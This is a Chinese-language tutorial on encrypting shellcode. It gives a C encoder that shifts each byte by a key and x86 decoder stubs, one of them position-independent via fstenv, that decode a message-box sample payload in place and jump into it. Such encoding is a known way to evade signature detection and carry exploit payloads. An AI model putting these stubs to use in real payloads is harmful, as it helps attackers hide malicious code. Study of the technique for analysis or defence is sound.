shellcode 进行加密原理



对shellcode 进行加密:

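#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Sample input for encoder() below. It contains no 0x00 byte (so strlen()
 * measures all of it) and exactly one 0x90, as the final byte: the decoder
 * stubs on this page stop at the first decoded 0x90, so that byte is the
 * terminator and must not occur earlier in the buffer. */
char popup_general[] =
    "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
    "\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
    "\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
    "\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
    "\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
    "\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
    "\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
    "\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
    "\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
    "\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
    "\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90"; // shellcode should be ended with 0x90

/*
 * encoder - write a byte-wise additive transform of `input` to encode.txt.
 *
 * Every byte b of `input` is replaced by (b + key) mod 256. The result is
 * written to "encode.txt" as a C string literal: an opening quote, one
 * "\xNN" escape per byte with a quote/newline/quote break after every 16th
 * byte, and a closing `";`. When display_flag is non-zero the same bytes are
 * also printed to stdout as space-separated hex, 16 per line.
 *
 * `input` is treated as a C string, so its length comes from strlen(): a
 * buffer containing a 0x00 byte is silently truncated at that byte.
 *
 * On allocation or file failure a message is printed to stderr and the
 * process exits with EXIT_FAILURE (the original exited with status 0, which
 * made failures indistinguishable from success in scripts).
 */
void encoder(const char *input, unsigned char key, int display_flag)
{
    size_t len = strlen(input);
    /* len + 1 cannot overflow for a strlen() result; calloc keeps the
     * trailing byte zeroed. */
    unsigned char *output = calloc(len + 1, 1);
    if (!output) {
        fprintf(stderr, "memory error!\n");
        exit(EXIT_FAILURE);
    }

    /* Work on unsigned bytes: with a signed `char`, values above 0x7F are
     * negative, and casting first makes the modulo-256 wrap explicit and
     * identical on every platform. */
    for (size_t i = 0; i < len; i++) {
        output[i] = (unsigned char)((unsigned char)input[i] + key);
    }

    FILE *fp = fopen("encode.txt", "w+");
    if (!fp) {
        free(output);
        fprintf(stderr, "output file create error\n");
        exit(EXIT_FAILURE);
    }
    /* Emit a C string literal, 16 escapes per line, so the output can be
     * pasted straight back into a source file. */
    fputc('"', fp);
    for (size_t i = 0; i < len; i++) {
        fprintf(fp, "\\x%02x", output[i]);
        if ((i + 1) % 16 == 0) {
            fputs("\"\n\"", fp);
        }
    }
    fputs("\";", fp);
    /* fclose() flushes; a failed flush would leave a short or empty file. */
    if (fclose(fp) != 0) {
        free(output);
        fprintf(stderr, "output file write error\n");
        exit(EXIT_FAILURE);
    }
    printf("dump the encoded shellcode to encode.txt OK!\n");

    if (display_flag) { // print to screen
        for (size_t i = 0; i < len; i++) {
            printf("%02x ", output[i]);
            if ((i + 1) % 16 == 0) {
                printf("\n");
            }
        }
    }
    free(output);
}

/* Encode the sample above with key 0x02 and echo the result to the console. */
int main(void)
{
    encoder(popup_general, 0x2, 1);
    getchar(); // presumably keeps the console window open until a key is pressed
    return 0;
}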

对 shellcode 进行解密并运行:

unsigned char data[] = "\xfe\x6a\x6c\x0c\x3a\x20\x6a\x65\x8b\xd3\x51\x6a\x34\x76\x93\x0e""\x8d\xf6\x8f\x80\xf6\x35\xdd\xb9\x06\x2d\xe5\x68\xbd\x35\x34\x55""\x6a\x77\x75\x67\x74\x56\x35\xd4\x66\x8d\x5c\x32\x8d\x4d\x0e\x8d""\x4b\x1e\x8d\x0b\x8d\x6b\x0a\xaf\x3f\x6c\x0c\x3a\x20\x77\x07\x97""\x01\x59\xfa\x97\x62\x8d\x47\x3e\x8d\x4e\x07\x7a\x05\xcf\x8d\x5b""\x22\x05\xdf\x35\x01\x49\x8d\x36\xbd\x05\xf7\x9b\x11\xc0\x08\x3c""\xc6\x76\x0a\xc3\xcc\x09\x05\xd2\x48\xed\xf3\x3d\x56\x26\x1e\x77""\xe6\x8d\x5b\x26\x05\xdf\x68\x8d\x3e\x7d\x8d\x5b\x1e\x05\xdf\x05""\x2e\xbd\x97\x61\xad\x59\x63\x3f\x6c\x0c\x3a\x20\x77\xab\x35\xdd""\x55\x6a\x79\x67\x75\x76\x6a\x68\x63\x6b\x6e\x8d\xc6\x55\x52\x52""\x55\x01\x59\xfe\x55\x01\x59\xfa\x92";__asm{lea eax,dataxor ecx,ecxnoop:mov bl, [eax+ecx]sub bl,2mov [eax+ecx],blinc ecxcmp bl, 0x90jnz nooppush eaxret}}
确认能运行后，再将它改为这样:

unsigned char data[] = "\x83\xC0\x14"//       ADD EAX,14"\x33\xC9"         // XOR ECX,ECX"\x8A\x1C\x08"      //  MOV BL,BYTE PTR DS:[EAX+ECX]"\x80\xEB\x02"     //  SUB BL,2"\x88\x1C\x08"     //   MOV BYTE PTR DS:[EAX+ECX],BL"\x41"           // INC ECX"\x80\xFB\x90" //      CMP BL,90"\x75\xF1"//         JNZ SHORT shellcod.00401165"\xfe\x6a\x6c\x0c\x3a\x20\x6a\x65\x8b\xd3\x51\x6a\x34\x76\x93\x0e""\x8d\xf6\x8f\x80\xf6\x35\xdd\xb9\x06\x2d\xe5\x68\xbd\x35\x34\x55""\x6a\x77\x75\x67\x74\x56\x35\xd4\x66\x8d\x5c\x32\x8d\x4d\x0e\x8d""\x4b\x1e\x8d\x0b\x8d\x6b\x0a\xaf\x3f\x6c\x0c\x3a\x20\x77\x07\x97""\x01\x59\xfa\x97\x62\x8d\x47\x3e\x8d\x4e\x07\x7a\x05\xcf\x8d\x5b""\x22\x05\xdf\x35\x01\x49\x8d\x36\xbd\x05\xf7\x9b\x11\xc0\x08\x3c""\xc6\x76\x0a\xc3\xcc\x09\x05\xd2\x48\xed\xf3\x3d\x56\x26\x1e\x77""\xe6\x8d\x5b\x26\x05\xdf\x68\x8d\x3e\x7d\x8d\x5b\x1e\x05\xdf\x05""\x2e\xbd\x97\x61\xad\x59\x63\x3f\x6c\x0c\x3a\x20\x77\xab\x35\xdd""\x55\x6a\x79\x67\x75\x76\x6a\x68\x63\x6b\x6e\x8d\xc6\x55\x52\x52""\x55\x01\x59\xfe\x55\x01\x59\xfa\x92\x90";__asm{lea eax,datapush eaxret}}
shellcode加解密完成

但实际中会遇到各种情况，比如插入的 shellcode 前面还有其他代码，那么我们加密的这段 shellcode 就不在最前端，解码时的偏移就会出错，因为上面的解码头写死了 add eax,14。

经修改后，它可以放在 shellcode 的中间段使用:

#include "stdafx.h"
#include <Windows.h>

/* Decoder stub followed by the XOR-0x11 encoded payload. The first 27 bytes
 * obtain their own address (fldz / fstenv / pop eax), add 0x1b to skip past
 * themselves, then XOR each following byte with 0x11 in place until a decoded
 * byte equals 0x90, which is therefore the required terminator (the last
 * payload byte, 0x81, decodes to 0x90). Because the address comes from the
 * FPU environment rather than a fixed offset, the stub does not depend on
 * being first in the buffer, which is the point of this revision. */
unsigned char data[] =
    "\xD9\xEE"            // fldz
    "\xD9\x74\x24\xF4"    // fstenv (28-byte) ptr ss:[esp-0xC]
    "\x58"                // pop eax -- yields the EIP of the fldz above (GetPC; see http://www.programlife.net/shellcode-getpc.html)
    "\x83\xC0\x1b"        // add eax,0x1b -- skip the 27-byte stub (the original comment said 0x19; the byte is 0x1b)
    "\x33\xC9"            // XOR ECX,ECX
    "\x8A\x1C\x08"        // MOV BL,BYTE PTR DS:[EAX+ECX]
    "\x80\xF3\x11"        // xor bl,0x11
    "\x88\x1C\x08"        // MOV BYTE PTR DS:[EAX+ECX],BL
    "\x41"                // INC ECX
    "\x80\xFB\x90"        // CMP BL,90
    "\x75\xF1"            // JNZ SHORT shellcod.00401165
    // The above is 27 bytes (2+4+1+3+2+3+3+3+1+3+2), not 25 as originally noted.
    // The following is 169 bytes
    "\xed\x79\x7b\x1b\x29\x0f\x79\x72\x98\xc0\x5e\x79\x23\x65\x80\x1d"
    "\x9a\xe5\x9c\x6f\xe5\x22\xca\xa6\x15\x3a\xf2\x77\xaa\x22\x23\x42"
    "\x79\x64\x62\x74\x63\x45\x22\xc3\x75\x9a\x4b\x21\x9a\x5a\x1d\x9a"
    "\x58\x0d\x9a\x18\x9a\x78\x19\xbc\x2c\x7b\x1b\x29\x0f\x64\x14\x84"
    "\xee\x46\xe9\x84\x71\x9a\x54\x2d\x9a\x5d\x14\x69\x12\xdc\x9a\x48"
    "\x31\x12\xcc\x22\xee\x56\x9a\x25\xaa\x12\xe4\x88\x1e\xaf\x17\x2b"
    "\xd5\x65\x19\xd0\xdb\x16\x12\xc1\x57\xfa\xe0\x2a\x45\x35\x0d\x64"
    "\xf5\x9a\x48\x35\x12\xcc\x77\x9a\x2d\x6a\x9a\x48\x0d\x12\xcc\x12"
    "\x3d\xaa\x84\x4e\xba\x46\x70\x2c\x7b\x1b\x29\x0f\x64\xb8\x22\xca"
    "\x42\x79\x75\x70\x21\x32\x79\x32\x41\x70\x7f\x9a\xd5\x42\x41\x41"
    "\x42\xee\x46\xed\x42\xee\x46\xe9\x81";
//#panda0#

/* MSVC-only, 32-bit inline asm: pushes the address of `data` and "returns"
 * into it, so execution continues inside the global array above.
 * NOTE(review): `data` is an ordinary initialized global, i.e. writable,
 * non-executable memory; on a build where DEP/NX is enforced this transfer
 * faults instead of running. A control transfer into writable data is
 * precisely the event such mitigations and host telemetry are built to
 * catch, so this listing only works where that protection is absent. */
int main()
{
    __asm {
        lea eax,data
        push eax
        ret
    }
    return 0;
}

